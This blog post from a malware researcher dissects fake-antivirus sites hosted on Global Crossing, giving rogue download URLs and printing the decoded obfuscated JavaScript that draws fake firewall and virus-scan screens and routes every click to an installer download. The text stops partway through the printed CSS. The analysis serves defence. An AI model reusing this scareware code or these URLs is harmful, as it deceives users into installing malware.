Blog for hpHosts, and whatever else I feel like writing about ....

Thursday 2 July 2009

Decoding the Global Crossing rogues

Global Crossing are currently hosting a whole host of rogues such as Fast Antvirus. One thing the latest ones have in common, is their use of a seemingly randomly named .js file, that does the bulk of the work to ensure you get infected with it.

Most of us will either;

1. Load the site up in the browser
2. Analyze the sites source code to identify the download location so we can automate downloads of new samples

I tend to opt for the latter myself, which is why I'm posting this. When I looked at a site a couple of days ago, I got the .js file decoded, went through it's code, and identified the download URL as;

http://guardincorp.info/build[n]_[n].php?cmd=getFile&counter=

Where [n] is a random number, for example;

http://guardincorp.info/build08_12.php?cmd=getFile&counter=

This produced a downoad called Setup_build-1_7.exe. The newer sites since then however, have changed a bit, and now require a little extra. It does still produce the file without it, but the file is 0KB.

Lets start from the beginning shall we? The site we're going to look at today is trustshield.info (IP: 64.213.140.69). When you first load this site, if you've got scripts enabled (and I should warn, NEVER do this with ActiveX enabled aswell!!), you'll see a prompt, followed by the following, which then leads on to the usual "OH NOES! YAZ NEEDZ MA APPZ!" stuff.



But let's look behind this. If we pull the main URL's source code we can see that the source code shows the standard HTML, a landing.gif image, and everything else is contained within the script that's loaded;

vURL Online - http://trustshield.info/?p=WKmimHVlbHKHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw==
http://vurl.mysteryfcm.co.uk/?url=700412



If we now look at the .js file, we see a rather large "a" var, that's processed by an incy bit of code at the bottom;

vURL Online - trustshield.info/Scripts/Strategies/6a20f3f566cb9dc9a1ef4af2dee0c2168120317.js
http://vurl.mysteryfcm.co.uk/?url=700418

We can use Malzilla to decode this, without having to do any special modifications or replacements that are sometimes required by the more complex obfuscations, as they've made this extremely simple for us. The following is what the script eventually decodes to after going through two levels of obfuscation;

var rand="b054322b4787c82e9c449353623b80088d5500e56b82106676d5f30db76e9f551ec664bbf3f9f201e9a9946ccc2adf72bc8471ab149eddae62d85fd959bac16555a501f4e816b66a763ff384f5a2f4c9eed496d886348e425fe09043af7e0c7cf5b33b1693ce4f0cd18b541fe20b4590cf544fae160e1d3f9f8b41154999c4e1e6bc0246ea89a3bb4f48594f9e0510683b6f8133cc986e348cac9547727055402adec822510569b1cd8fe3182bcc0b75a703b0f02650398908ba6f97160c4565e4efef8dbfe209859dd0e84e34d8e03d1a43033f6a721d657e9608c7ea56d04e1084803b372a666042ed57b5a63996df74753a5";
var strategy=
{
"preLandingTemplate":"<table cellpadding=\"0\" cellspacing=\"0\" align=\"center\" width=\"395px\">\r\n<tr>\r\n<td>\r\n<table width=\"378px\" cellpadding=\"0\" cellspacing=\"0\" style=\"position:relative;
top:28px;
left:24px\">\r\n <tr>\r\n <td width=\"6px\" height=\"5px\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/left_top.gif\" width=\"6\"\r\n height=\"5\" alt=\"\" border=\"0\"><\/td>\r\n <td style=\"border-top:#d3d3d3 1px solid;
\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/spacer.gif\"\r\n width=\"1\" height=\"1\" alt=\"\" border=\"0\"><\/td>\r\n <td width=\"5px\" height=\"5px\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/right_top.gif\" width=\"5\"\r\n height=\"5\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td height=\"95px\" width=\"5\" style=\" border-left:#d3d3d3 1px solid\"><img\r\n src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/spacer.gif\" width=\"1\" height=\"1\" alt=\"\" border=\"0\">\r\n <\/td>\r\n <td align=\"center\" valign=\"middle\">\r\n <table width=\"80%\" height=\"75px\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"\r\n style=\"font-size:12px\">\r\n <tr>\r\n <td align=\"left\">Operating system:<\/td>\r\n <td align=\"left\" height=\"25px\" id=\"os_label\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td align=\"left\" height=\"25px\">Internet browser:<\/td>\r\n <td align=\"left\" id=\"browser_label\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td align=\"left\" height=\"25px\">Scan time:<\/td>\r\n <td align=\"left\" id=\"scantime_label\"><\/td>\r\n <\/tr>\r\n <\/table>\r\n\r\n <\/td>\r\n <td style=\"border-right:#d3d3d3 1px solid\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/spacer.gif\"\r\n width=\"1\" height=\"1\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td height=\"5px\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/left_bottom.gif\" width=\"6\" height=\"5\" alt=\"\"\r\n border=\"0\"><\/td>\r\n <td style=\"border-bottom:#d3d3d3 1px solid;
font-size:1px\"><img\r\n src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/spacer.gif\" width=\"1\" height=\"1\" alt=\"\" border=\"0\">\r\n <\/td>\r\n <td><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/right_bottom.gif\" width=\"5\" height=\"5\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n<\/table>\r\n<div style=\"width:100px;
position:relative;
top:40px;
left:30px;
font-size:20px;
color:#727272;
\">\r\n <div id=\"dot2\"\r\n style=\"width:20px;
height:22px;
background:url(Layouts\/Landings\/PreLandings\/3\/images\/list\/green_dot.jpg) no-repeat;
font-size:20px;
color:#727272;
position:relative;
top:3px;
left:0px;
float:left;
visibility:hidden\"><\/div>\r\n <div id=\"stage1\" style=\"visibility:hidden\"> Stage 1<\/div>\r\n<\/div>\r\n<div id=\"check1\"\r\n style=\"font-size:14px;
font-weight:bold;
position:relative;
top:50px;
left:55px;
visibility:hidden\">\r\n Checking firewall status\r\n<\/div>\r\n<div style=\"position:relative;
top:65px;
left:54px\"><img id=\"scroll1\"\r\n src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/anim-line.gif\"\r\n style=\"visibility:hidden\" width=\"304\" height=\"15\" alt=\"\" border=\"0\">\r\n<\/div>\r\n<div id=\"way1\" style=\"font-size:10px;
position:relative;
top:70px;
left:56px;
visibility:hidden\">Sending data\r\n to server\r\n<\/div>\r\n<table id=\"fire_dis\" cellpadding=\"0\" cellspacing=\"0\" height=\"33px\" width=\"303px\"\r\n style=\"font-size:10px;
position:relative;
top:60px;
left:56px;
visibility:hidden\">\r\n <tr>\r\n <td width=\"303px\" height=\"4\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/red_top.jpg\" width=\"303\"\r\n height=\"4\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td background=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/red_bg.jpg\">\r\n <div style=\"position:relative;
top:2px;
left:13px;
width:270px;
height:25px;
background:url(Layouts\/Landings\/PreLandings\/3\/images\/list\/x.jpg) no-repeat;
color:#FFFFFF;
padding-left:28px;
font-size:14px;
font-weight:bold;
padding-top:3px\">\r\n Firewall protection disabled\r\n <\/div>\r\n <\/td>\r\n <\/tr>\r\n <tr>\r\n <td width=\"303px\" height=\"4\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/red_bottom.jpg\" width=\"303\"\r\n height=\"4\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n<\/table>\r\n<div style=\"width:100px;
position:relative;
top:90px;
left:30px;
font-size:20px;
color:#727272;
\">\r\n <div style=\"width:22px;
height:20px;
background:url(Layouts\/Landings\/PreLandings\/3\/images\/list\/red_dot.jpg) no-repeat;
font-size:20px;
color:#727272;
position:relative;
top:3px;
left:0px;
float:left;
visibility:hidden\"\r\n id=\"dot1\"><\/div>\r\n <div id=\"stage\" style=\"visibility:hidden\"> Stage 2<\/div>\r\n<\/div>\r\n<div id=\"check\"\r\n style=\"font-size:14px;
font-weight:bold;
position:relative;
top:100px;
left:55px;
visibility:hidden\">\r\n Checking installed security software\r\n<\/div>\r\n<div style=\"position:relative;
top:115px;
left:54px;
width:304px\"><img id=\"scroll2\" style=\"visibility:hidden\"\r\n src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/anim-line.gif\"\r\n width=\"304\" height=\"15\" alt=\"\" border=\"0\"><\/div>\r\n<div id=\"way\" style=\"font-size:10px;
position:relative;
top:120px;
left:56px;
visibility:hidden;
width:300px\">Prepare to\r\n scan\r\n<\/div>\r\n\r\n<table id=\"fire_dis1\" cellpadding=\"0\" cellspacing=\"0\" height=\"33px\" width=\"303px\"\r\n style=\"font-size:10px;
position:relative;
top:110px;
left:56px;
visibility:hidden\">\r\n <tr>\r\n <td width=\"303px\" height=\"4\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/yel_top.jpg\" width=\"303\"\r\n height=\"4\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td background=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/yel_bg.jpg\">\r\n <div style=\"position:relative;
top:2px;
left:13px;
width:270px;
height:25px;
background:url(Layouts\/Landings\/PreLandings\/3\/images\/list\/!small.jpg) no-repeat;
color:#000000;
padding-left:28px;
font-size:14px;
font-weight:bold;
padding-top:3px\">\r\n Antivirus protection not found\r\n <\/div>\r\n <\/td>\r\n <\/tr>\r\n <tr>\r\n <td width=\"303px\" height=\"4\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/yel_bottom.jpg\" width=\"303\"\r\n height=\"4\" alt=\"\" border=\"0\"><\/td>\r\n <\/tr>\r\n<\/table>\r\n<table id=\"yellow\" width=\"395px\" height=\"60px\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"\r\n style=\"font-size:10px;
position:relative;
top:125px;
left:16px;
visibility:hidden\">\r\n <tr>\r\n <td width=\"395px\" height=\"6px\"><\/td>\r\n <\/tr>\r\n <tr>\r\n <td width=\"395\" height=\"48px\" align=\"center\">\r\n <table width=\"90%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\r\n <tr>\r\n <td width=\"45px\" align=\"left\"><img src=\"Layouts\/Landings\/PreLandings\/3\/images\/list\/!.gif\"\r\n width=\"33\" height=\"41\" alt=\"\" border=\"0\"><\/td>\r\n <td style=\"font-size:12px;
color:#000000;
\" align=\"left\"><span id=\"yellow1\"\r\n style=\"color:#cf1212;
font-weight:bold;
visibility:hidden\">Warning! <\/span>Important\r\n add-ons to the system needed!\r\n <\/td>\r\n <\/tr>\r\n <\/table>\r\n <\/td>\r\n <\/tr>\r\n <tr>\r\n <td width=\"395px\" height=\"5px\"><\/td>\r\n <\/tr>\r\n<\/table>\r\n<\/td>\r\n<\/tr>\r\n<\/table>\r\n\r\n","preLandingTemplateInitScript":"var $exec_time=Math.floor(Math.random()*5)+7;var $t1=0;var $i1=0;var $s1=0;var $x1=Math.floor(Math.random()*20)+50;var $c=0;var $d=0;var $f1=0;var $f2=0;var $scan_time=1;var preLanding={};function fire(){document.getElementById(\"dot2\").style.visibility=\"visible\";document.getElementById(\"stage1\").style.visibility=\"visible\";document.getElementById(\"check1\").style.visibility=\"visible\";document.getElementById(\"scroll1\").style.visibility=\"visible\";document.getElementById(\"way1\").style.visibility=\"visible\";fire2()}function fire2(){if($f2<3){document.getElementById(\"way1\").innerHTML=document.getElementById(\"way1\").innerHTML+\".\";setTimeout(function(){fire2()},300);$f2++}else{document.getElementById(\"way1\").style.visibility=\"hidden\";document.getElementById(\"check1\").innerHTML=\"Firewall status is checked\";setTimeout(function(){fire3()},200)}}function fire3(){document.getElementById(\"fire_dis\").style.visibility=\"visible\";document.getElementById(\"scroll1\").style.visibility=\"hidden\";document.getElementById(\"dot2\").style.backgroundImage=\"url(Layouts\/Landings\/PreLandings\/3\/images\/list\/red_dot.jpg)\";setTimeout(function(){stage2()},200)}function stage2(){document.getElementById(\"dot1\").style.visibility=\"visible\";document.getElementById(\"dot1\").style.backgroundImage=\"url(Layouts\/Landings\/PreLandings\/3\/images\/list\/green_dot.jpg)\";document.getElementById(\"stage\").style.visibility=\"visible\";document.getElementById(\"check\").style.visibility=\"visible\";document.getElementById(\"scroll2\").style.visibility=\"visible\";document.getElementById(\"way\").style.visibility=\"visible\";scan()}function scan(){var a=$scan_time\/(storage.preLandings.files.length-1);document.getElementById(\"way\").innerHTML=storage.preLandings.files[$f1];if($f1<storage.preLandings.files.length-1){$f1++;setTimeout(function(){scan()},a*1000)}else{document.getElementById(\"way\").innerHTML=\"Scan is complete\";document.getElementById(\"fire_dis1\").style.visibility=\"visible\";document.getElementById(\"scroll2\").style.visibility=\"hidden\";document.getElementById(\"way\").style.visibility=\"hidden\";document.getElementById(\"check\").innerHTML=\"Security software is checked\";document.getElementById(\"dot1\").style.backgroundImage=\"url(Layouts\/Landings\/PreLandings\/3\/images\/list\/red_dot.jpg)\";setTimeout(function(){blink2()},1000)}}function blink2(){var a=document.getElementById(\"yellow\");if(a!=null){a.style.visibility=\"visible\";setTimeout(function(){blink1()},300)}}function blink1(){if(document.getElementById(\"yellow1\").style.visibility==\"hidden\"){document.getElementById(\"yellow1\").style.visibility=\"visible\";setTimeout(function(){blink2()},700)}else{document.getElementById(\"yellow1\").style.visibility=\"hidden\";setTimeout(function(){blink2()},700)}}function startPreLanding(){fire()}startPreLanding();","preLandingTemplateCSSFile":"div#preLandingCssTestElement{width:2px;}div#preLandingCssTestElement{width:2px;}body{height:600px;margin:0;font-family:tahoma,fantasy;font-size:12px;}","isShowPreLanding":false,"preLandingShowMinTime":4,"preLandingCSSFile":"Layouts\/Landings\/PreLandings\/3\/css\/preLanding.css","preLandingImagesList":[
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/left_top.gif","width":6,"height":5
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/right_top.gif","width":5,"height":5
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/left_bottom.gif","width":6,"height":5
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/spacer.gif","width":1,"height":1
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/right_bottom.gif","width":5,"height":5
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/red_top.jpg","width":303,"height":4
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/red_bottom.jpg","width":303,"height":4
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/anim-line.gif","width":304,"height":15
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/yel_top.jpg","width":303,"height":4
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/yel_bottom.jpg","width":303,"height":4
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/!.gif","width":33,"height":41
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/green_dot.jpg","width":20,"height":22
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/red_dot.jpg","width":20,"height":20
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/yel_bg.jpg","width":303,"height":1
}
,
{
"path":"Layouts\/Landings\/PreLandings\/3\/images\/list\/!small.jpg","width":21,"height":26
}
],"centralLandingTemplate":"<div class=\"centrallanding_main\">\n\t<div class=\"centrallanding_super\" id=\"centrallanding_top_panel\">\n \t<div class=\"centrallanding_super\" id=\"centrallanding_top_panel_left\"><\/div>\n <div class=\"centrallanding_super\" id=\"centrallanding_top_panel_right\"><\/div>\n My computer\n <\/div>\n <div class=\"centrallanding_address\">\n \t<div class=\"centrallanding_super\" id=\"centrallanding_addr_1\"><\/div>\n <div class=\"centrallanding_super\" id=\"centrallanding_panel\">\n \tMy computer\n <a href=\"\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_address_img_3\"><\/div><\/a>\n\t\t\t\n <\/div>\n <div class=\"centrallanding_super\" id=\"centrallanding_addr_2\"><a href=\"\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_address_img_4\"><\/div><\/a><\/div>\n <\/div>\n\t<div class=\"centrallanding_left\">\n\t\t<div class=\"centrallanding_spacer\"><\/div>\n <div class=\"centrallanding_super\" id=\"secure\"><\/div>\n\t\t<div class=\"centrallanding_super_1\" id=\"centrallanding_left_1\">\n \t<div class=\"centrallanding_spacer\"><\/div>\n \t<div class=\"centrallanding_super_1\" id=\"centrallanding_top_1\">System Tasks<\/div>\n <div class=\"centrallanding_super_1\" id=\"centrallanding_bottom_1\"><\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_1\"><\/div>View system information<\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_2\"><\/div>Add or remove programs<\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_3\"><\/div>Change a settings<\/div>\n <\/div>\n\t\t<div class=\"centrallanding_super_1\" id=\"centrallanding_left_2\">\n \t<div class=\"centrallanding_spacer\"><\/div>\n \t<div class=\"centrallanding_super_1\" id=\"centrallanding_top_2\">Other Places<\/div>\n <div class=\"centrallanding_super_1\" id=\"centrallanding_bottom_2\"><\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_4\"><\/div>My Network Places<\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_5\"><\/div>My Documents<\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_6\"><\/div>Shared Documents<\/div>\n\t\t\t<div class=\"centrallanding_left_inner\" onclick=\"kPromo.initiateDownload();
return false;
\"><div class=\"centrallanding_super\" id=\"centrallanding_left_img_7\"><\/div>Control Panel<\/div>\n <\/div>\n\t\t<div class=\"centrallanding_super_1\" id=\"centrallanding_left_3\">\n \t<div class=\"centrallanding_spacer\"><\/div>\n \t<div class=\"centrallanding_super_1\" id=\"centrallanding_top_3\">Details<\/div>\n <div class=\"centrallanding_super_1\" id=\"centrallanding_bottom_3\"><\/div>\n\t\t\t<strong>My Computer<\/strong><br \/>\nSystem Folder\n <\/div>\n\t<\/div>\n\t\n\t<div class=\"centrallanding_right\">\n\t\t<div class=\"centrallanding_spacer\"><\/div>\n\t\t<div class=\"centrallanding_right_1\">System folders<span id=\"centrallanding_right_1_alert\"><\/span><\/div>\n\t\t<div id=\"centrallanding_grad_1\" class=\"centrallanding_super\"><\/div>\n <div id=\"centrallanding_folder_1\" class=\"centrallanding_super\">\n \tShared Documents\n <div class=\"centrallanding_super\" id=\"centrallanding_virus_1\"><span id=\"centrallanding_virus_1_number\"><\/span> Viruses found<\/div>\n <\/div>\n <div id=\"centrallanding_folder_2\" class=\"centrallanding_super\">\n \tMy Documents\n <div class=\"centrallanding_super\" id=\"centrallanding_virus_2\"><span id=\"centrallanding_virus_2_number\"><\/span> Viruses found<\/div>\n <\/div>\n <div class=\"centrallanding_spacer\"><\/div>\n\t\t<div class=\"centrallanding_right_1\">Hard drive<span id=\"centrallanding_right_1_alert\"><\/span><\/div>\n\t\t<div id=\"centrallanding_grad_2\" class=\"centrallanding_super\"><\/div>\n <div class=\"centrallanding_super\" id=\"centrallanding_hdd_1\">\n \tHard drive (C:)\n <div class=\"centrallanding_super\" id=\"centrallanding_virus_3\"><span id=\"centrallanding_virus_3_number\"><\/span> Viruses found<\/div>\n <\/div>\n <div class=\"centrallanding_right_1\">Security<span id=\"centrallanding_right_1_alert\"><\/span><\/div>\n\t\t<div id=\"centrallanding_grad_3\" class=\"centrallanding_super\"><\/div>\n <div class=\"centrallanding_super\" id=\"centrallanding_sec_1\">\n \tWindows Security\n <div class=\"centrallanding_virus_2\" id=\"centrallanding_virus_2_1\">Security has been damaged by virus<\/div>\n <\/div>\n <div class=\"centrallanding_super_1\" id=\"centrallanding_scroll1\"><span id=\"centrallanding_scroll\">0<\/span><span>%<\/span>\n \t<div class=\"centrallanding_super_1\" id=\"centrallanding_scroll_bg\"><\/div>\n <\/div>\n <div class=\"centrallanding_progress\">Checking: <span id=\"centrallanding_progress\"> <\/span><\/div>\n <div class=\"centrallanding_super_1\" id=\"centrallanding_table\">\n \t<div class=\"centrallanding_table_text\">Your Computer is infected<\/div>\n \t\t<div class=\"centrallanding_spacer\"><\/div>\n \t<table class=\"centrallanding_inner_table\" cellpadding=\"0\" cellspacing=\"0\">\n \t<tr class=\"centrallanding_table_tr_1\">\n \t<td colspan=\"2\" width=\"260\">Name<\/td>\n <td width=\"4\"><div class=\"centrallanding_table_divider\" id=\"divider1\"><\/div><\/td>\n <td width=\"75\">Type<\/td>\n <td width=\"4\"><div class=\"centrallanding_table_divider\" id=\"divider2\"><\/div><\/td>\n <td>Threat level<\/td>\n <\/tr>\n <\/table>\n <div class=\"centrallanding_inner_table_cont\" id=\"centrallanding_inner_table_cont\">\n \t<div class=\"centrallanding_spacer\"><\/div>\n \t<table class=\"centrallanding_inner_table_2\" cellpadding=\"0\" cellspacing=\"0\">\n \n <\/table>\n <\/div>\n <div class=\"centrallanding_recommend\"><strong>Recommend:<\/strong> Click \"Start Protection\" button to erase all threats<\/div>\n <div class=\"centrallanding_start\">\n\t\t\t<form style=\"padding:0; margin:0; font-family:tahoma; font-size:11px\"><input type=\"button\" style=\"padding:0; margin:0; font-family:tahoma; font-size:11px\" value=\"Start Protection\" width=\"104\" height=\"23\" onclick=\"kPromo.initiateDownload();
return false;
\" \/><\/form>\n\t\t\t<!-- <img src=\"Layouts\/Landings\/CentralLandings\/6\/images\/list\/start.gif\" width=\"104\" height=\"23\" \/> -->\n\t\t\t<\/div>\n <\/div>\n\t<\/div>\n<\/div>","centralLandingAlertTemplate":"<div id=\"cl_alert\" style=\"display:none\">\n\t<div id=\"cl_main\" class=\"centrallanding_table_divider\">\n \t<div class=\"close\" onclick=\"kPromo.alerts.hideWindow('cl_alert');
kPromo.landings.showPostLanding();
\"><\/div>\n <div class=\"move\" onmousedown = \"kPromo.alerts.enableDrag (event);
\"><\/div>\n <div class=\"spacer\"><\/div>\n <div class=\"text1\">To help protect your computer, Windows Web Security have detected Trojans and ready to remove them.<\/div>\n <div class=\"cl_viruses\">\n \t<div class=\"virus\" id= \"viruses\">\n <\/div>\n <div class=\"virusname\" id= \"hazardType\">\n <\/div>\n \t\n <\/div>\n <div class=\"text2\">Spyware is software, which can gather information from user's computer throught Internet connection and send them to its creater. Gather information can be passwords, e-mail adresses and all that data, which is important for you.<\/div>\n <div class=\"remove\" onclick=\"kPromo.alerts.hideWindow ('cl_alert'); kPromo.initiateDownload();return false;\" ><\/div>\n <div class=\"cancel\" onclick=\"kPromo.alerts.hideWindow ('cl_alert'); kPromo.initiateDownload();return false;\" ><\/div>\n <\/div>\n\n<\/div>","centralLandingTemplateInitScript":"var $delay=30;var $x=0;var $t=0;var $t1=0;var $count=Math.floor(Math.random()*4)+9;var $count1=Math.floor(Math.random()*($count-3))+3;var $inner2=\"\";var $inner=[];$items=Math.floor(504\/$count);var virusArrayLength=storage.centralLandings.virusNames.length;shuffle=function(d){for(var b,a,c=d.length;c;b=parseInt(Math.random()*c),a=d[--c],d[c]=d[b],d[b]=a){}return d};var $virus=shuffle(storage.centralLandings.virusNames);var $files=shuffle(storage.common.filenames);for($i=0;$i<$count;$i++){$inner[$i]='<tr><td><div class=\"centrallanding_super\" style=\"width:13px;
height:16px;
background-position:0 -797px;
\"><\/div><\/td><td width=\"285\"><strong>'+$virus[$i][0]+'<\/strong><\/td><td width=\"90\">Virus<\/td><td><strong><font color=#ff0000>'+$virus[$i][1]+\"<\/font><\/strong><\/td><\/tr>\";document.getElementById(\"viruses\").innerHTML+='<div class=\"virus_1_1\"><div class=\"centrallanding_super\" style=\"width:13px;
height:16px;
background-position:0 -797px;
position:absolute;
left:0;
top:2px;
\"><\/div>'+$virus[$i][0]+\"<\/div>\";document.getElementById(\"hazardType\").innerHTML+='<div class=\"virus_1_1\">'+$files[$i]+\"<\/div>\"}function shieldBlink(){if(document.getElementById(\"centrallanding_sec_1\").style.backgroundPosition==\"0px -518px\"){document.getElementById(\"centrallanding_sec_1\").style.backgroundPosition=\"0px -566px\"}else{document.getElementById(\"centrallanding_sec_1\").style.backgroundPosition=\"0px -518px\"}setTimeout(function(){shieldBlink()},500)}function blink1(){if(document.getElementById(\"centrallanding_virus_1\").style.visibility==\"visible\"){document.getElementById(\"centrallanding_virus_1\").style.visibility=\"hidden\"}else{document.getElementById(\"centrallanding_virus_1\").style.visibility=\"visible\"}if(document.getElementById(\"centrallanding_virus_3\").style.visibility==\"visible\"){document.getElementById(\"centrallanding_virus_3\").style.visibility=\"hidden\"}else{document.getElementById(\"centrallanding_virus_3\").style.visibility=\"visible\"}setTimeout(function(){blink1()},500)}function blink2(){if(document.getElementById(\"centrallanding_virus_2\").style.visibility==\"visible\"){document.getElementById(\"centrallanding_virus_2\").style.visibility=\"hidden\"}else{document.getElementById(\"centrallanding_virus_2\").style.visibility=\"visible\"}setTimeout(function(){blink2()},500)}function startCentral(){$x+=2;document.getElementById(\"centrallanding_scroll_bg\").style.width=$x+\"px\";document.getElementById(\"centrallanding_scroll\").innerHTML=Math.floor($x\/5);document.getElementById(\"centrallanding_progress\").innerHTML=storage.common.folders[Math.floor(Math.random()*7)]+storage.common.filenames[Math.floor(Math.random()*60)];if($x%($items)==0){$t++;if($t==1){blink1()}document.getElementById(\"centrallanding_table\").style.visibility=\"visible\";document.getElementById(\"centrallanding_virus_3_number\").innerHTML=$t;if($t<=$count1){document.getElementById(\"centrallanding_virus_1_number\").innerHTML=$t}else{$t1++}if($t1==1){blink2()}if($t1>0){document.getElementById(\"centrallanding_virus_2_number\").innerHTML=$t1}$inner2+=$inner[$t-1];$inner1='<div class=\"centrallanding_spacer\"><\/div><table class=\"centrallanding_inner_table_2\" cellpadding=\"0\" cellspacing=\"0\">'+$inner2+\"<\/table>\";document.getElementById(\"centrallanding_inner_table_cont\").innerHTML=$inner1}if($x<504){setTimeout(function(){startCentral()},$delay)}else{document.getElementById(\"centrallanding_virus_2_1\").style.visibility=\"visible\";shieldBlink();setTimeout(function(){kPromo.alerts.showWindow(\"cl_alert\",439,463)},1000)}}startCentral();","centralLandingTemplateCSSFile":"@charset \"windows-1251\";div#centralLandingCssTestElement{width:2px;}div.backgroundOpacityLayer{display:none;}.centrallanding_super{background:url(Layouts\/Landings\/CentralLandings\/6\/images\/list\/all_vert.gif);}.centrallanding_super_1{background:url(Layouts\/Landings\/CentralLandings\/6\/images\/list\/all_hor.gif);}.centrallanding_main{width:800px;height:600px;position:absolute;left:50%;top:50%;margin-left:-390px;margin-top:-300px;font-family:tahoma;font-size:1px;}img{border:none;}#centrallanding_top_panel{width:774px;height:21px;background-repeat:repeat-x;background-position:0 -169px;font-size:11px;color:#fff;font-weight:bold;padding-left:26px;padding-top:9px;}#centrallanding_top_panel_left{width:26px;height:30px;position:absolute;left:0;top:0;background-position:0 -109px;}#centrallanding_top_panel_right{width:75px;height:30px;background-position:0 -139px;position:absolute;right:0;top:0;cursor:pointer;overflow:hidden;}.centrallanding_address{height:23px;width:794px;border-left:3px solid #0731d9;border-right:3px solid #0731d9;position:relative;}#centrallanding_address_img_3{width:15px;height:18px;background-position:0 -265px;position:absolute;right:1px;top:1px;}#centrallanding_address_img_4{width:19px;height:20px;background-position:0 -283px;margin-left:5px;}#centrallanding_addr_1{width:45px;height:22px;position:absolute;top:1px;left:0;background-position:0 -199px;}#centrallanding_panel{height:17px;width:674px;border:1px solid #7f9db9;position:absolute;top:1px;left:45px;background-position:4px -244px;background-repeat:no-repeat;font-size:11px;color:#000;padding-left:23px;padding-top:3px;}#centrallanding_addr_2{width:50px;height:22px;background-position:0 -221px;background-repeat:repeat-x;position:absolute;right:0;top:1px;}.centrallanding_left{height:537px;width:222px;border-left:3px solid #0731d9;border-bottom:3px solid #0731d9;background:#7190e0;position:relative;}#secure{position:absolute;left:53px;bottom:14px;width:131px;height:64px;background-position:0 -662px;}.centrallanding_spacer{width:1px;height:1px;font-size:1px;}.centrallanding_spacer15{width:1px;height:15px;font-size:1px;}.centrallanding_right{position:absolute;left:225px;width:572px;border-right:3px solid #0731d9;border-bottom:3px solid #0731d9;height:537px;top:53px;overflow:auto;}#centrallanding_left_1{width:186px;background-position:-206px 0;background-repeat:repeat-y;position:relative;margin-top:7px;margin-left:6px;font-size:11px;padding-top:28px;padding-bottom:13px;padding-left:10px;line-height:1.4;padding-right:10px;margin-top:15px;}#centrallanding_top_1{position:absolute;left:0;top:0;height:19px;width:192px;font-size:11px;font-weight:bold;font-family:tahoma;color:#345ab8;padding-left:14px;padding-top:4px;}#centrallanding_bottom_1{position:absolute;left:0;bottom:0;background-position:-412px 0;height:2px;width:206px;font-size:1px;}#centrallanding_left_2{width:186px;background-position:-206px 0;background-repeat:repeat-y;position:relative;margin-top:7px;margin-left:6px;font-size:11px;padding-top:28px;padding-bottom:13px;padding-left:10px;line-height:1.4;padding-right:10px;margin-top:15px;}#centrallanding_top_2{position:absolute;left:0;top:0;height:19px;width:192px;font-size:11px;font-weight:bold;font-family:tahoma;color:#345ab8;padding-left:14px;padding-top:4px;}#centrallanding_bottom_2{position:absolute;left:0;bottom:0;background-position:-412px 